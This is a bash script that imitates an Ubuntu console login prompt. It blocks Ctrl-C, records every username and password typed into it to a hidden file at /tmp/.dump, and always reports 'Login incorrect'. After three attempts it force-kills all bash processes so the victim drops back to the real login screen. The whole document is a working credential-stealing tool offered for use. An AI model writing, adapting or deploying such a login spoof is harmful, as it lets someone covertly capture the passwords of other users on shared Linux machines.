# Made by Pranav Joshi & Deepak Kaul # joshipranav [at the rate] gmail [dot] com # # Bash script to emulate login prompt for Linux Machines.. # # Ctrl-C is blocked # entered passwords are saved to /tmp/.dump # # this script kills all bash instances after it's execution and # returns to the main login prompt so be prepared before u run it #!/bin/bash clear #Uncomment if you want to erase the /tmp/dump file each time #> /tmp/.dump #Your Login BANNER BANNER='Ubuntu 5.10 "Breezy Badger" PTbuntu tty1' #HOSTNAME HN=PTuntu #RUN Set to 0 RUN=0 echo $BANNER echo while [ $RUN -lt 3 ] do echo -n $HN login:; trap "" SIGINT SIGTERM; read USER if [ ${USER}abc = abc ] then echo $BANNER echo continue else echo username is $USER >> /tmp/.dump echo -n Password: ; read -s PSWD if [ ${PSWD}abc = abc ] then echo ; echo ; continue fi echo password is $PSWD >> /tmp/.dump ; echo fi echo Login incorrect echo RUN=`expr $RUN + 1` done # Registers the PID of first instance of bash #BPID=`ps u | tr -s " " ":" | grep [-]bash | head -n1 | cut -d":" -f2` # Registers PIDs of all bash instances (Safer) BPID=`ps u | tr -s " " ":" | grep bash | cut -d":" -f2` sleep 1 kill -9 $BPID